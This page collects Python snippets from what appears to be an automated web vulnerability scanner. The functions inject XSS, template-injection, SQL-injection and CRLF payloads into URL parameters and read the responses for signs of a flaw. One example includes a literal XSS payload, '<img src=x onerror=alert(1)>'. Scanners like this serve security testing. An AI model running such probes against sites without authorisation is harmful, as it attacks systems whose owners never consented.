Exemplo n.º 1
0
 def Put(url):
     mt = methods.Put(url.split('?')[0], urlparse(url).query)
     if mt == 0:
         pass
     elif mt == 1 and refxss.Put(url) == 1:
         for param in url.split('?')[1].split('&'):
             for payload in xss_payloads:
                 data = urlparse(url.replace(param, param + payload)).query
                 d = post_data(data)
                 if d == 0:
                     break
                 req = nq.Put(url.split('?')[0], post_data(data))
                 if req == 0:
                     break
                 if payload.encode('utf-8') in req.content:
                     bug = {
                         'name': 'Corss-site scripting',
                         'payload': payload,
                         'method': 'PUT',
                         'parameter': param,
                         'target': url.split('?')[0],
                         'data': data
                     }
                     show.bug(bug='Cross-site scripting',
                              payload=payload,
                              method='PUT',
                              parameter=param,
                              target=url.split('?')[0],
                              link=data)
                     return bug
     return None
Exemplo n.º 2
0
 def Get(url):
     if methods.Get(url) == 1:
         if 1 == 1:
             for param in url.split('?')[1].split('&'):
                 for payload, message in ssti_payloads.items():
                     r = nq.Get(url)
                     if r == 0:
                         break
                     r = len(findall(message.encode('utf-8'), r.content))
                     req = nq.Get(url.replace(param, param + en(payload)))
                     if req == 0:
                         break
                     if r < len(
                             findall(message.encode('utf-8'), req.content)):
                         bug = {
                             'name': 'template injection',
                             'payload': payload,
                             'method': 'GET',
                             'parameter': param,
                             'link': url.replace(param,
                                                 param + en(payload)),
                             'target': url.split('?')[0]
                         }
                         show.bug(bug='template injection',
                                  payload=payload,
                                  method='GET',
                                  parameter=param,
                                  link=url.replace(param,
                                                   param + en(payload)))
                         return bug
     return None
Exemplo n.º 3
0
 def Put(url):
     if methods.Put(url) == 1:
         for param in url.split('?')[1].split('&'):
             for payload, message in ssti_payloads.items():
                 if post_data(urlparse(url).query) == 0:
                     break
                 r = nq.Put(
                     url.split('?')[0], post_data(urlparse(url).query))
                 if r == 0:
                     break
                 r = len(findall(message.encode('utf-8'), r.content))
                 data = urlparse(url.replace(param, param + payload)).query
                 req = nq.Put(url.split('?')[0], post_data(data))
                 if req == 0:
                     break
                 if r < len(findall(message.encode('utf-8'), req.content)):
                     bug = {
                         'name': 'template injection',
                         'payload': payload,
                         'method': 'PUT',
                         'parameter': param,
                         'target': url.split('?')[0],
                         'data': data
                     }
                     show.bug(bug='template injection',
                              payload=payload,
                              method='PUT',
                              parameter=param,
                              target=url.split('?')[0],
                              link=data)
                     return bug
     return None
Exemplo n.º 4
0
 def Put(url):
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             if post_data(urlparse(url).query) == 0:
                 break
             r = nq.Put(url, post_data(urlparse(url).query))
             if r == 0:
                 break
             save_request.save(r)
             data = urlparse(url.replace(param, param + payload)).query
             req = nq.Put(url.split('?')[0], post_data(data))
             if req == 0:
                 break
             for n, e in sql_err.items():
                 r = findall(e.encode('utf-8'), save_request.get().content)
                 r2 = findall(e.encode('utf-8'), req.content)
                 if len(r) < len(r2):
                     bug = {
                         'name': 'SQL injection',
                         'payload': payload,
                         'method': 'PUT',
                         'parameter': param,
                         'target': url.split('?')[0],
                         'data': data
                     }
                     show.bug(bug='SQL injection',
                              payload=payload,
                              method='PUT',
                              parameter=param,
                              target=url.split('?')[0],
                              link=data)
                     return bug
     return None
Exemplo n.º 5
0
 def Get(url):
     mt = methods.Get(url)
     if mt == 0:
         pass
     elif mt == 1 and refxss.Get(url) == 1:
         for param in url.split("?")[1].split("&"):
             for payload in xss_payloads:
                 req = nq.Get(url.replace(param, param + en(payload)))
                 if req != 0:
                     if payload.encode('utf-8') in req.content:
                         bug = {
                             'name': 'Corss-site scripting',
                             'payload': payload,
                             'method': 'GET',
                             'parameter': param,
                             'link': url.replace(param, param + en(payload))
                         }
                         show.bug(bug='Cross-site scripting',
                                  payload=payload,
                                  method='GET',
                                  parameter=param,
                                  link=url.replace(param,
                                                   param + en(payload)))
                         return bug
     return None
Exemplo n.º 6
0
 def Post(url):
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             d = post_data(urlparse(url).query)
             if d == 0:
                 break
             r = nq.Post(url, post_data(urlparse(url).query))
             if r == 0:
                 break
             save_request.save(r)
             data = urlparse(url.replace(param, param + payload)).query
             req = nq.Post(url.split('?')[0], post_data(data))
             if req == 0:
                 break
             for n, e in sql_err.items():
                 r = findall(e.encode('utf-8'), save_request.get().content)
                 r2 = findall(e.encode('utf-8'), req.content)
                 if len(r) < len(r2):
                     show.bug(bug='SQL injection',
                              payload=payload,
                              method='POST',
                              parameter=param,
                              target=url.split('?')[0],
                              link=data)
                     break
Exemplo n.º 7
0
 def Get(url):
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             r = nq.Get(url)
             if r == 0:
                 break
             save_request.save(r)
             req = nq.Get(url.replace(param, param + payload))
             if req == 0:
                 break
             for n, e in sql_err.items():
                 r2 = findall(e.encode('utf-8'), save_request.get().content)
                 r3 = findall(e.encode('utf-8'), req.content)
                 if len(r2) < len(r3):
                     bug = {
                         'name': 'SQL injection',
                         'payload': payload,
                         'method': 'GET',
                         'parameter': param,
                         'link': url.replace(param, param + en(payload)),
                         'target': url.split('?')[0]
                     }
                     show.bug(bug='SQL injection',
                              payload=payload,
                              method='GET',
                              parameter=param,
                              target=url.split('?')[0],
                              link=url.replace(param, param + en(payload)))
                     return bug
     return None
Exemplo n.º 8
0
 def Get(url):
     for param in url.split('?')[1].split('&'):
         for payload in crlf_payloads:
             r = nq.Get(url.replace(param,param + en(payload)))
             if r == 0:
                 break
             if r.headers.get('Header-Test'):
                 bug = {
                         'name':'CRLF injection',
                         'payload':payload.replace('\n','%0a').replace('\r','%0d'),
                         'method':'GET',
                         'parameter':param,
                         'link':url.replace(param,param + en(payload)),
                         'target':url.split('?')[0]
                     }
                 show.bug(
                 bug='CRLF injection',
                 payload=payload.replace('\n','%0a').replace('\r','%0d'),
                 method='GET',
                 parameter=param,
                 link=url.replace(param,param + en(payload))
                         )
                 return bug
             else:
                 continue
     return None
Exemplo n.º 9
0
def NEON_CVE(url):
    urls = add_path(url)
    for u in urls:
        r = nq.Post(u, post_data('q=<img src=x onerror=alert(1)>'))
        if '<img src=x onerror=alert(1)>'.encode('utf-8') in r.content:
            show.bug(bug='Cross-site scripting',
                     payload='<img src=x onerror=alert(1)>',
                     method='GET',
                     parameter='q',
                     target=u,
                     link='q=<img src=x onerror=alert(1)>')
Exemplo n.º 10
0
 def Get(url):
     for param in url.split("?")[1].split("&"):
         for payload in xss_payloads:
             req = nq.Get(url.replace(param, param + en(payload)))
             if req != 0:
                 if payload.encode('utf-8') in req.content:
                     show.bug(bug='Cross-site scripting',
                              payload=payload,
                              method='GET',
                              parameter=param,
                              link=url.replace(param, param + en(payload)))
                     break
Exemplo n.º 11
0
 def Get(url):
     for param in url.split('?')[1].split('&'):
         for payload in crlf_payloads:
             r = nq.Get(url.replace(param, param + en(payload)))
             if r == 0:
                 break
             if 'BLATRUC' == r.headers.get('Header-Test'):
                 show.bug(bug='CRLF injection',
                          payload=payload.replace('\n', '%0a').replace(
                              '\r', '%0d'),
                          method='GET',
                          parameter=param,
                          link=url.replace(param, param + en(payload)))
             else:
                 continue
Exemplo n.º 12
0
 def Get(url):
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             r = nq.Get(url)
             if r == 0:
                 break
             r = len(findall(message.encode('utf-8'), r.content))
             req = nq.Get(url.replace(param, param + en(payload)))
             if req == 0:
                 break
             if r < len(findall(message.encode('utf-8'), req.content)):
                 show.bug(bug='template injection',
                          payload=payload,
                          method='GET',
                          parameter=param,
                          link=url.replace(param, param + en(payload)))
                 break
Exemplo n.º 13
0
 def Put(url):
     for param in url.split('?')[1].split('&'):
         for payload in xss_payloads:
             data = urlparse(url.replace(param, param + payload)).query
             d = post_data(data)
             if d == 0:
                 break
             req = nq.Put(url.split('?')[0], post_data(data))
             if req == 0:
                 break
             if payload.encode('utf-8') in req.content:
                 show.bug(bug='Cross-site scripting',
                          payload=payload,
                          method='PUT',
                          parameter=param,
                          target=url.split('?')[0],
                          link=data)
                 break
Exemplo n.º 14
0
 def Post(url):
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             if post_data(urlparse(url).query) == 0:
                 break
             r = nq.Post(url.split('?')[0], post_data(urlparse(url).query))
             if r == 0:
                 break
             r = len(findall(message.encode('utf-8'), r.content))
             data = urlparse(url.replace(param, param + payload)).query
             req = nq.Post(url.split('?')[0], post_data(data))
             if req == 0:
                 break
             if r < len(findall(message.encode('utf-8'), req.content)):
                 show.bug(bug='template injection',
                          payload=payload,
                          method='POST',
                          parameter=param,
                          target=url.split('?')[0],
                          link=data)
                 break